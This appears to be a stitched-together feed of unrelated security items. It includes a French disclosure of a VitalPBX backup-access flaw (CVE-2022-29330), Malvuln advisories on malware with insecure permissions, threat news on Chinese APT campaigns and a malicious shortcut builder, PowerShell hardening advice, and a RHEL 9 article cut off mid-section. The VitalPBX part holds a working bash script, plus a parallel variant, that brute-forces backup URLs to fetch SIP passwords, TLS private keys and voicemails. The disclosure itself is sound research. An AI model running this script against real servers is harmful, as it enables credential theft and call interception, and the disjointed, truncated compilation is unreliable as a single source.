Missing access control in the backup system of Telesoft VitalPBX before 3.2.1 allows attackers to access the PJSIP and SIP extension credentials, cryptographic keys and voicemails files via unspecified vectors.

Alors que nous jouions avec configurions notre VitalPBX tranquillement, nous avons découvert une vulnérabilité relativement facile à mettre en œuvre et donnant accès à des données qu’on ne devrait pas pouvoir lire librement (_i.e._ les mot de passe des extensions, mais pas que). Voici comment elle fonctionne... et pourquoi vous devriez mettre votre version à jours.

Inutile pour une famille, donc indispensable pour une famille geek, nous avons un IPBX à la maison. Parmi les nombreux logiciels sur le marché, nous avons installé un VitalPBX dans une machine virtuelle connectée au reste de notre réseau et qui fait le lien entre nos téléphones IP (des IP-8815) et nos lignes externes analogiques (via une passerelle HX4G connectée aux boxes des FAI).

Au fil de nos aventures dans ce monde merveilleux de la VoIP, nous avons expérimenté plein d’astuces qui nous permettent d’avoir, @home, toutes les fonctionnalités qu’on attend d’un système téléphonique d’entreprise (ou d’hôtel) : groupe de sonnerie, messagerie vocale et test de turing (pour éviter les robots d’appel)...

© Rodrigo SalomonHC @ pixabay

Dernière en date : la sauvegarde (parce que les sauvegardes, c’est important). C’est vrai que vu notre infrastructure, ce serveur est rapide à installer et les rares données qu’il contient peuvent être perdues, on aurait donc pu faire l’impasse. Le truc, c’est qu’en tant qu’experts judiciaire, on ne se voit pas intervenir pour des juges et des entreprises sans savoir de quoi on parle (et aussi parce qu’au fond, configurer des serveurs, on aime ça).

Et c’est justement en cherchant à configurer le système de sauvegarde, ou plutôt à l’automatiser, que nous avons découvert cette vulnérabilité...

Les fichiers de sauvegardes étaient accessibles via l’interface web sans aucune restriction et donnent accès, en clair, aux mots de passe aux clés cryptographiques et aux boites vocales (entre autre). Heureusement, c’est corrigé depuis le 4 mai (version 3.2.1) donc mettez votre système à jours.

**La sauvegarde chez VitalPBX**

La configuration des sauvegardes de VitalPBX se fait via l’interface d’administration web. Une fois connecté, vous devez vous rendre dans « admin / Tools / Backup & Restore ». Le formulaire présenté par défaut permet de créer un nouveau profil de sauvegarde, avec au minimum, un nom.

Créer un profil de sauvegarde

Une fois vos profils de sauvegarde créés, vous pouvez les lister via l’icone de menu () puis y accéder en cliquant sur leur nom. Le nouvel écran reprend le formulaire de configuration et ajoute la liste des sauvegardes déjà effectuée (dans la limite configurée plus haut), vous permet d’en restauter une (bouton  à droite dans la ligne correspondante) et de créer de nouveaux points de sauvegarde (bouton  en bas à gauche de l’écran).

Détail d’un profil de sauvegarde

Si vous voulez faire des sauvegardes automatiquement, il faut d’abord ajouter un profile de tâche automatique (via le menu « PBX / Tools / cron profiles ») car tant qu’il n’y en a pas, le champ _Run automatically_ ne poropose que la valeure disabled).

**Vulnérabilités des fichiers de sauvegardes**

Comme vous l’aviez peut être vu, l’interface web propose aussi un bouton  pour télécharger un point de sauvegarde. En cliquant dessus, vous obtiendrez alors une archive au format tar que vous pourriez sauvegarder de votre côté. Ce n’est pas évident parce qu’il nous cache les détails (il est opaque) mais ce bouton ne fait que rediriger votre navigateur vers l’adresse du fichier qui pourrait ressembler à ce qui suit :

    https://monipbx.monreseau.lan/static/backup/c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

Ça n’a l’air de rien vu comme ça mais en vérifiant les détails, vous allez voir que ça va poser problème.

**Téléchargement sans contrôle d’accès**

La configuration du serveur web se trouve, comme toujours sur les _Red Hat_, dans /etc/httpd/conf.d/ et plus particulièrement, le fichier vitalpbx.conf. On y trouve la configuration des vhosts (serveurs web virtuels) utilisés par vitalpbx, dont celui de l’interface d’administration web qui nous intéresse et dont voici un extrait :

    <VirtualHost *:443>
            ...
            <Directory "/var/lib/vitalpbx/static">
                    Require all granted
            </Directory>
            Alias /static "/var/lib/vitalpbx/static"
            ...
    </VirtualHost>

Si on le lit du bas en haut, on apprend que le préfixe /static dans l’adresse est en fait un alias qui correspond au répertoire /var/lib/vitalpbx/static. Puis (ou plutôt _avant_) que ce répertoire est en libre accès (Require all granted). Aucun code PHP, aucune ligne de configuration ou fichier .htaccess ne viendra tempérer cette absence de contrôle d’accès.

Si on connait l’adresse d’un fichier, on peut y accéder sans contrainte.

Seule consolation, le serveur ne permet pas de lister les fichiers dans un répertoire ; si vous accédez à https://monipbx.monreseau.lan/static/backup/, le système vous retournera une erreur _403 - Forbidden_ (vous n’avez pas le droit de voir le contenu du répertoire).

**Adresse déterministe**

Il faut donc deviner le reste de l’adresse des fichiers de sauvegarde...

    c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

*   **c4ca4238a0b923820dcc509a6f75849b**, est facile à trouver, il suffirait de la coller dans n’importe quel moteur de recherche pour découvrir qu’il s’agit du MD5 de la chaîne « 1 » (l’identifiant du profil de sauvegarde). En faisant le test avec de nouveaux profiles on obtiens, à chaque fois, le MD5 de leur identifiant, c81e728d9d4c2f636f067f89cc14862c pour 2, puis eccbc87e4b5ce2fe28308fd9f2a7baf3 pour 3, et ainsi de suite.
    
*   **1650260415** est plus subtile (les moteurs de recherche ne vous aideront pas) mais ce n’est que le timestamp du fichier ; soit le nombre de secondes écoulées depuis le 1^er^ janvier 1970 lorsque le fichier a été écrit sur le disque...
    

Tout ce qu’il faut, c’est trouver un identifiant de profil et un timestamp valide, deux informations dont les valeurs suivent des suites toutes simples.

On peut énumérer les profiles (nombres entiers consécutifs) et les timestamps (à rebours à partir de _maintenant_) jusqu’à trouver un fichier de sauvegarde.

**L’exploitation**

Plutôt que tester ces possibilités à la main, on peut automatiser tout ça. Voici une solution en bash 😉. Pour faire court, on teste tous les timestamps sur les dernières 24 heures, pour les 10 premiers profiles. Et on quitte le script dès que curl a trouvé quelque chose.

    #!/bin/bash
    
    now=$(date +%s)
    past=$(date -d "1 day ago" +%s)
    
    for profile in $(seq 1 10) ; do
        md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
    
        curl -sk "https://localhost/static/backup/$md5/" -o /dev/null -w "%{http_code}" | grep -q "404" && continue
    
        for timestamp in $(seq $now -1 $past) ; do
            curl -fJOsk "https://monipbx.monreseau.lan/static/backup/$md5/vitalpbx-$timestamp.tar" && exit 1
        done
    done

Si vous êtes pressé, on peut accélérer tout ça avec un peu de parallélisme sur les appels à curl. Pour ça, on va modifier la boucle intérieure et directement passer le résultat de seq à xargs.

        export md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
        ...
        seq $now -1 $past | xargs -P 10 -I % bash -c \
            'curl -fJOsk "https://localhost/static/backup/$md5/vitalpbx-%.tar" && exit 255' \
            || exit 1

**Impact**

Le fichier de sauvegarde est une archive tar contenant d’autres archives (gz et tar.gz). Et parmi tout ce qui est sauvegardé, quelques éléments sont particulièrement intéressant...

*   **asterisk.sql.gz** contient, entre autre, la configuration de certaines extensions PJSIP et leurs identifiants (logins et mots de passe en clair),
*   **dialplan.tar.gz** contient, entre autre, la configuration des extensions SIP (dans sip__50-1-extensions.conf) et PJSIP (dans pjsip__50-1-extensions.conf), dont les identifiants (logins et mots de passe en clair),
*   **certificates.tar.gz** contient les certificats TLS ainsi que leur clé privée correspondante,
*   **voicemail.tar.gz**, comme son nom l’indique, contient les boites vocales, c’est à dire les messages audio que les correspondants ont laissé.

Donc, si quelqu’un a la main sur votre fichier de sauvegarde, il peut :

*   **Usurper les extensions** auprès du serveur de VoIP, et lire les messages vocaux laissés par les correspondants,
*   **Usurper le serveur** de configuration (_e.g._ avec un proxy HTTPS) et ensuite récupérer les mots de passe des administrateurs.

Et une fois qu'on a le mot de passe de l'administrateur, on peut tout faire.

**Correction**

_Telesoft S.A_ a corrigé cette vulnérabilité dans la version 3.2.1, une fois mis à jours, votre serveur n’est donc plus vulnérable à cette attaque 🎉.

Dans le détail, les fichiers de sauvegardes ne sont plus accessible directement (ils sont déplacés dans /var/lib/vitalpbx/backup, en dehors des répertoires accessibles par apache) et nécessitent donc passer par l’interface utilisateur en PHP qui fait les vérifications d’authentification.

Pour savoir si votre installation a été victime de cette attaque, vous pouvez regarder les journaux du serveur web. Ils se trouvent dans /var/log/httpd, une recherche sur /static/backup vous dira si des accès ont eu lieu. Si vous constatez des accès, et si vous voulez rester prudent, changez vos clés TLS et les mots de passe (extensions et pour être prudent, utilisateurs).

**Historique de publication**

*   **Découverte de la vulnérabilité :** 1er avril 2022,
*   **Communication à l’éditeur :** 1er avril 2022,
*   **Correctif de sécurité :** 4 mai 2022 (version 3.2.1 R1).

CVE-2022-29330: CVE-2022-29330 - Vulnérabilité dans VitalPBX < 3.2.1

Backdoor.Win32.InfecDoor.17.c malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/1fd70e41918c3a75c634b1c234ec36fb.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.InfecDoor.17.cVulnerability: Insecure PermissionsDescription: The malware writes a ".420" settings file type to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the file dropped by the malware to disable, change its settings or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: InfecDoorType: PE32MD5: 1fd70e41918c3a75c634b1c234ec36fbVuln ID: MVID-2022-0614Disclosure: 06/23/2022Exploit/PoC:C:\>cacls Infector.420C:\Infector.420 BUILTIN\Administrators:(ID)F                NT AUTHORITY\SYSTEM:(ID)F                BUILTIN\Users:(ID)R                NT AUTHORITY\Authenticated Users:(ID)CC:\>dir Infector.420 Volume in drive C has no label. Directory of C:\04/11/2022  03:29 AM                36 Infector.420               1 File(s)             36 bytes               0 Dir(s)  24,644,292,608 bytes freeC:\>type Infector.420[My_OVER_ALL_SETTINGS]FirsTime=0Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.InfecDoor.17.c MVID-2022-0614 Insecure Permissions

Trojan-Mailfinder.Win32.VB.p malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/20e438d84aa2828826d52540d80bf7f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Mailfinder.Win32.VB.pVulnerability: Insecure PermissionsDescription:  The malware writes a dir with multiple PE files to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: VBType: PE32MD5: 20e438d84aa2828826d52540d80bf7faVuln ID: MVID-2022-0616Disclosure: 06/23/2022Exploit/PoC:C:\>cacls IMBC:\IMB BUILTIN\Administrators:(OI)(CI)(ID)F       NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F       BUILTIN\Users:(OI)(CI)(ID)R       NT AUTHORITY\Authenticated Users:(ID)C       NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)CC:\>dir IMB Volume in drive C has no label. Directory of C:\IMB09/12/2003  09:07 PM           140,288 comdlg32.ocx06/16/2004  01:17 PM           282,624 IMB.exe09/12/2003  09:07 PM         1,388,544 msvbvm60.dll09/12/2003  09:07 PM           108,336 MSWINSCK.OCX09/15/2003  05:16 PM               192 Readme.txt10/04/2001  12:16 AM           147,483 scrrun.dll10/04/2001  12:16 AM            17,920 stdole2.tlb09/12/2003  09:07 PM             2,864 winsock.dll               8 File(s)      2,088,251 bytesDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan-Mailfinder.Win32.VB.p MVID-2022-0616 Insecure Permissions

Backdoor.Win32.Shark.btu malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/5a83f8b8c8a8b7a85b3ff632aa60e793.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Shark.btuVulnerability: Insecure PermissionsDescription:  The malware writes multiple PE files to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: SharkType: PE32MD5: 5a83f8b8c8a8b7a85b3ff632aa60e793Vuln ID: MVID-2022-0615Disclosure: 06/23/2022Exploit/PoC:C:\Fraps BUILTIN\Administrators:(OI)(CI)(ID)F         NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F         BUILTIN\Users:(OI)(CI)(ID)R         NT AUTHORITY\Authenticated Users:(ID)C         NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)CC:\>dir Fraps Volume in drive C has no label. Directory of C:\Fraps01/14/2008  08:12 AM            12,988 changes.txt01/14/2008  08:51 AM           172,032 fraps.dll01/14/2008  08:53 AM           913,064 fraps.exe01/14/2008  08:51 AM         1,683,968 fraps64.dat01/14/2008  08:51 AM           111,616 fraps64.dll01/14/2008  08:51 AM           135,168 frapslcd.dll05/12/2022  02:02 AM    DIR           HELP01/14/2008  08:07 AM             1,841 README.HTM05/12/2022  02:02 AM            34,552 uninstall.exe               8 File(s)      3,065,229 bytesDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Shark.btu MVID-2022-0615 Insecure Permissions

Yashma Ransomware Builder version 1.2 malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/13e878ed7e547523cffc5728f6ba4190.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Yashma Ransomware Builder v1.2Vulnerability: Insecure PermissionsDescription: The malware creates PE files with insecure permissions when writing to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.Family: YashmaType: PE32MD5: 13e878ed7e547523cffc5728f6ba4190Vuln ID: MVID-2022-0613 Disclosure: 06/23/2022Exploit/PoC:C:\>cacls hate.exeC:\hate.exe BUILTIN\Administrators:(ID)F            NT AUTHORITY\SYSTEM:(ID)F            BUILTIN\Users:(ID)R            NT AUTHORITY\Authenticated Users:(ID)CC:\>dir hate.exe Volume in drive C has no label. Directory of C:\05/14/2022  01:20 AM            54,784 hate.exe               1 File(s)         54,784 bytesDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Yashma Ransomware Builder 1.2 MVID-2022-0613 Insecure Permissions

By Deeba Ahmed
This newly discovered malware campaign is attributed to a Chinese hacking group called Tropic Trooper. Cybersecurity researchers at…
This is a post from HackRead.com Read the original post: Chinese Hackers Distributing Nim language Malware in SMS Bomber Tool

****This newly discovered malware campaign is attributed to a Chinese hacking group called Tropic Trooper.****

Cybersecurity researchers at Check Point have shared details of a new malware campaign suspected to be launched by a Chinese hacking group Tropic Trooper.

The malware operators are using a unique loader Nimbda, written in Nim language, and a new variant of Yahoyah trojan.

Researchers state that the hackers possess extensive cryptographic knowledge as they have extended the AES specification in a customized implementation.

**Info-Stealing Trojan Embedded in SMS Bomber Tool**

According to Check Point’s analysis, the info stealing trojan is hidden inside a Chinese language greyware tool called SMS Bomber. This tool is used for targeting cellphones with Denial of Service attacks (DoS attacks).

SMS Bomber tool allows users to enter any phone number to flood their phones with a message, rendering the devices unusable. Novice hackers typically use such tools to compromise websites.

**Attack Scenario**

When the infected version of SMS Bomber (equipped with standard functionalities and the tool’s binary) is downloaded to the device, the attack sequence is immediately initiated. The downloaded tool also contains additional coding injected into a notepad.exe process. 

In a blog post, researchers explained that This executable is the Nimbda loader, which uses the SMS Bomber as an icon and an executable while the loader injects shellcode in the notepad process in the background. The process then reaches a GitHub repository, fetches an obfuscated executable, decodes it, and executes it through process hollowing in Dllhost.exe, the new Yahoyah variant. 

This variant collects host-related data and transmits it to the attacker-operated C2 server. The final payload that Yahoyah executable drops is encoded in a JPG file through steganography. Researchers identified it as TClient. It is a backdoor used in previous campaigns by Tropic Trooper.

The interface of SMS Bomber (left) – Infection chain of the malware (right)

**What Information is Collected**

Yahoyah can collect device names, local wireless networks’ SSIDs located within the target device’s vicinity, MAC address, antivirus products installed on the device, OS version, and presence of Tencent and WeChat files.

The encryption used for Yahoyah is a custom AES implementation to perform the inverted sequence of round operations twice. Therefore, Check Point named it AEES. Though it doesn’t make encryption any stronger, it makes analyzing it complicated for researchers.

**Potential Targets**

Tropic Trooper has mainly focused on espionage in their previously identified phishing campaigns targeting Russian entities. However, in this campaign, the hackers have trojanized the SMS Bomber tool; hence they have narrowed down their targets.

Researchers believe their target could be based on the intelligence information the group collected during past espionages. Tropic Trooper also uses KeyBoy, Earth Centaur, and Pirate Panda monikers.

The group has a history of targeting targets in Hong Kong, Taiwan, and the Philippines. Moreover, their prominent targets are linked to the government, transportation, healthcare, and technology sectors.

**More Chinese Hackers in Action News**

*   China’s insidious surveillance against Uyghurs with Android malware
*   Android malware HenBox hits Xiaomi devices & minority group in China
*   China arrests 11 hackers for infecting 250M devices with Fireball malware
*   Someone from China is Distributing Mirai Malware Through Windows Botnet
*   Unofficial Micropatch for Follina Issued as Chinese Hackers Exploit the 0-day

Chinese Hackers Distributing Nim language Malware in SMS Bomber Tool

International cybersecurity authorities have published a Cybersecurity Information Sheet on making it harder to abuse PowerShell
The post Cybersecurity agencies: You don’t have to delete PowerShell to secure it appeared first on Malwarebytes Labs.

Microsoft’s PowerShell is a useful, flexible tool that is as popular with criminals as it is with admins. Cybercrooks like it becasue PowerShell is powerful, available almost everywhere, and doesn’t look out of place running on a company network.

In most places it isn’t practical to block PowerShell completely, which raises the question: How do you stop the bad stuff without disrupting the good stuff?

Cybersecurity authorities from the United States, New Zealand, and the United Kingdom have released a joint Cybersecurity Information Sheet (CIS) on PowerShell that attempts to answer that question.

The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom National Cyber Security Centre (NCSC-UK) hope that “these recommendations will help defenders detect and prevent abuse by threat actors, while enabling legitimate use by administrators and defenders.”

**PowerShell**

Although it’s closely associated with the world of Windows administration, PowerShell is a cross-platform (Windows, Linux, and macOS) automation and configuration tool which, by design, is optimized for dealing with structured data. Initially a Windows component only, known as Windows PowerShell, it was made open-source and cross-platform on 18 August 2016 with the introduction of PowerShell Core.

It allows system administrators and power users to perform administrative tasks via a command line—an area where Windows previously lagged behind its Unix-like rivals with their proliferation of \*sh shells.

Threat actors are equally fond of it because it allows them to “live off the land”, and for the options it provides to create fileless malware or to gain persistence on a compromised system.

**Reduce abuse**

The CIS discusses some security features available in PowerShell which can reduce abuse by threat actors.

**Remote connections**

Remote connections can be used for powerful remote management capabilities, so Windows Firewall rules on endpoints should be configured appropriately to control permitted connections. Access to endpoints with PowerShell remoting requires the requesting user account to have administrative privileges at the destination by default. The permission requirement and Windows Firewall rules are customizable for restricting connections to only trusted endpoints and networks to reduce lateral movement opportunities. Organizations can implement these rules to harden network security where feasible.

Multiple authentication methods in PowerShell permit use on non-Windows devices. PowerShell 7 permits remote connections over Secure Shell (SSH) in addition to supporting Windows Remote Management (WinRM) connections. This allows for public key authentication and makes remote management through PowerShell of machines more convenient and secure.

**AMSI integration**

The Antimalware Scan Interface (AMSI) feature, first available on Windows 10, is integrated into different Windows components. It supports scanning of in-memory and dynamic file contents using an anti-malware product registered with Windows and exposes an interface for applications to scan potentially malicious content. This feature requires AMSI-aware anti-malware products (such as Malwarebytes). Basically, AMSI works by analyzing scripts before the execution, so the anti-malware product can determine if the script is malicious or not.

**Constrained Language Mode**

Configuring AppLocker or Windows Defender Application Control (WDAC) to block actions on a Windows host will cause PowerShell to operate in Constrained Language Mode (CLM), restricting PowerShell operations unless allowed by administrator-defined policies.

**PowerShell methods to detect abuse**

Logging of PowerShell activities can record when cyber threats use PowerShell, and continuous monitoring of PowerShell logs can detect and alert on potential abuses. Deep Script Block Logging, Module Logging, and Over-the-Shoulder transcription are disabled by default. The authors recommend enabling the capabilities where feasible.

**Before you start**

If you plan on following the advice in the CIS, there are a few things you may want to consider first.

*   Execution Policies do not restrict execution of all PowerShell content.
*   AMSI bypasses are found and remediated in a constant whack-a-mole game, and most anti-malware products have different ways of accomplishing the same, or better, results. Therefor you will find that most AMSI-aware anti-malware products do not rely on AMSI alone.
*   If you are a customer of a Managed Service Provider (MSP) you may need to contact them before taking any of the actions listed above, since doing so may hinder them in their remote management.
*   Windows Remote Management/Remote Shell (WinRM/WinRS) connection limitations can become an obstacle in organizations with numerous administrators performing remote management, or that have multiple monitoring solutions connecting to the environment. By default, Microsoft Server limits the number of concurrent users connected to the WinRM/WinRS session to five and the number of shells per user to five. This can, and has often been modified by using an elevated command prompt.

Disabling PowerShell, if you do not need it, is a lot easier and safer than applying policies to make it safer to use. But looking at the options to make it more secure is certainly a good idea if you do need it.

Stay safe, everyone!

Cybersecurity agencies: You don’t have to delete PowerShell to secure it

A China-based advanced persistent threat (APT) group is possibly deploying short-lived ransomware families as a decoy to cover up the true operational and tactical objectives behind its campaigns.
The activity cluster, attributed to a hacking group dubbed Bronze Starlight by Secureworks, involves the deployment of post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora,

A China-based advanced persistent threat (APT) group is possibly deploying short-lived ransomware families as a decoy to cover up the true operational and tactical objectives behind its campaigns.

The activity cluster, attributed to a hacking group dubbed **Bronze Starlight** by Secureworks, involves the deployment of post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0.

"The ransomware could distract incident responders from identifying the threat actors' true intent and reduce the likelihood of attributing the malicious activity to a government-sponsored Chinese threat group," the researchers said in a new report. "In each case, the ransomware targets a small number of victims over a relatively brief period of time before it ceases operations, apparently permanently."

Bronze Starlight, active since mid-2021, is also tracked by Microsoft under the emerging threat cluster moniker DEV-0401, with the tech giant emphasizing its involvement in all stages of the ransomware attack cycle right from initial access to the payload deployment.

Unlike other RaaS groups that purchase access from initial access brokers (IABs) to enter a network, attacks mounted by the actor are characterized by the use of unpatched vulnerabilities affecting Exchange Server, Zoho ManageEngine ADSelfService Plus, Atlassian Confluence (including the newly disclosed flaw), and Apache Log4j.

Since August 2021, the group is said to have cycled through as many as six different ransomware strains such as LockFile (August), Atom Silo (October), Rook (November), Night Sky (December), Pandora (February 2022), and most recently LockBit 2.0 (April).

What's more, similarities have been uncovered between LockFile and Atom Silo as well as between Rook, Night Sky, and Pandora — the latter three derived from Babuk ransomware, whose source code leaked in September 2021 — indicating the work of a common actor.

"Because DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them," Microsoft noted last month.

Upon gaining a foothold inside a network, Bronze Starlight is known to rely on techniques like using Cobalt Strike and Windows Management Instrumentation (WMI) for lateral movement, although starting this month, the group has begun replacing Cobalt Strike with the Sliver framework in their attacks.

Other observed tradecraft relates to the use of HUI Loader to launch next-stage encrypted payloads such as PlugX and Cobalt Strike Beacons, the latter of which is employed to deliver the ransomware, but not before obtaining privileged Domain Administrator credentials.

"The use of HUI Loader to load Cobalt Strike Beacon, the Cobalt Strike Beacon configuration information, the C2 infrastructure, and the code overlap suggest that the same threat group is associated with these five ransomware families," the researchers explained.

It's worth pointing out that both HUI Loader and PlugX, alongside ShadowPad, are malware historically put to use by Chinese nation-state adversarial collectives, lending credence to the possibility that Bronze Starlight is more geared towards espionage than immediate monetary benefits.

On top of that, the victimology pattern spanning across the different ransomware strains shows that a majority of the targets are likely to be of more interest to Chinese government-sponsored groups focused on long-term intelligence gathering.

The key victims encompass pharmaceutical companies in Brazil and the U.S., a U.S.-based media organization with offices in China and Hong Kong, electronic component designers and manufacturers in Lithuania and Japan, a law firm in the U.S., and an aerospace and defense division of an Indian conglomerate.

To that end, the ransomware operations, besides providing a means to exfiltrate data as part of the double extortion "name-and-shame" scheme, also offer twin advantages in that it allows the threat actor to destroy forensic evidence of their malicious activities and act as a distraction from data theft.

"It is plausible that Bronze Starlight deploys ransomware as a smokescreen rather than for financial gain, with the underlying motivation of stealing intellectual property or conducting espionage," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

State-Backed Hackers Using Ransomware as a Decoy for Cyber Espionage Attacks

A new malware tool that enables cybercriminal actors to build malicious Windows shortcut (.LNK) files has been spotted for sale on cybercrime forums.
Dubbed Quantum Lnk Builder, the software makes it possible to spoof any extension and choose from over 300 icons, not to mention support UAC and Windows SmartScreen bypass as well as "multiple payloads per .LNK" file. Also offered are capabilities

A new malware tool that enables cybercriminal actors to build malicious Windows shortcut (.LNK) files has been spotted for sale on cybercrime forums.

Dubbed **Quantum Lnk Builder**, the software makes it possible to spoof any extension and choose from over 300 icons, not to mention support UAC and Windows SmartScreen bypass as well as "multiple payloads per .LNK" file. Also offered are capabilities to generate .HTA and disk image (.ISO) payloads.

Quantum Builder is available for lease at different price points: €189 a month, €355 for two months, €899 for six months, or as a one-off lifetime purchase for €1,500.

".LNK files are shortcut files that reference other files, folders, or applications to open them," Cyble researchers said in a report. "The \[threat actor\] leverages the .LNK files and drops malicious payloads using LOLBins \[living-off-the-land binaries\]."

Early evidence of malware samples using Quantum Builder in the wild is said to date back to May 24, masquerading as harmless-looking text files ("test.txt.lnk").

"By default, Windows hides the .LNK extension, so if a file is named as file\_name.txt.lnk, then only file\_name.txt will be visible to the user even if the show file extension option is enabled," the researchers said. "For such reasons, this might be an attractive option for TAs, using the .LNK files as a disguise or smokescreen."

Launching the .LNK file executes PowerShell code that, in turn, runs a HTML application ("bdg.hta") file hosted on Quantum's website ("quantum-software\[.\]online") using MSHTA, a legitimate Windows utility that's used to run HTA files.

Quantum Builder is said to share ties with the North Korean-based Lazarus Group based on source code-level overlaps in the tool and the latter's modus operandi of leveraging .LNK files for delivering further stage payloads, indicating its potential use by APT actors in their attacks.

The development comes as operators behind Bumblebee and Emotet are shifting to .LNK files as a conduit to trigger the infection chains following Microsoft's decision to disable Visual Basic for Applications (VBA) macros by default across its products earlier this year.

Bumblebee, a replacement for BazarLoader malware first spotted in March, functions as a backdoor designed to give the attackers persistent access to compromised systems and a downloader for other malware, including Cobalt Strike and Sliver.

The malware's capabilities have also made it a tool of choice for threat actors, with 413 incidents of Bumblebee infection reported in May 2022, up from 41 in April, according to Cyble.

"Bumblebee is a new and highly sophisticated malware loader that employs extensive evasive maneuvers and anti-analysis tricks, including complex anti-virtualization techniques," the researchers said. "It is likely to become a popular tool for ransomware groups to deliver their payload."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New 'Quantum' Builder Lets Attackers Easily Create Malicious Windows Shortcuts

Red Hat Enterprise Linux 9 (RHEL 9) is the latest version of Red Hat’s flagship operating system, released at the Red Hat Summit in May 2022. New capabilities added to RHEL 9 help simplify how organizations manage security and compliance when deploying new systems or managing existing infrastructure. This article takes a brief look at three of the new security features available in this release.

Red Hat Enterprise Linux 9 (RHEL 9) is the latest version of Red Hat’s flagship operating system, released at the Red Hat Summit in May 2022. New capabilities added to RHEL 9 help simplify how organizations manage security and compliance when deploying new systems or managing existing infrastructure. This article takes a brief look at three of the new security features available in this release.

**SSH root password login disabled by default**

The default superuser account in Unix- and Linux-based systems is "root". Because the username is always "root" and access rights are unlimited, this account is the most valuable target for hackers. Attackers use bots to scan for systems with exposed SSH ports, and when found, they attempt to use common usernames and brute-force passwords to gain entry. Of course, the impact of a successful exploit would be a lot lower if the compromised user has unprivileged access. The breach would then be contained and limited to one user only.

With RHEL 9, root user authentication with a password over SSH has been disabled by default. The OpenSSH default configuration only allows root logins via authentication methods such as public-key authentication, reducing the chance that attackers will gain access through brute-force password attacks. Instead of using the root password, developers can access remote development environments using SSH keys to log in.

**OpenSSL 3.0.1**

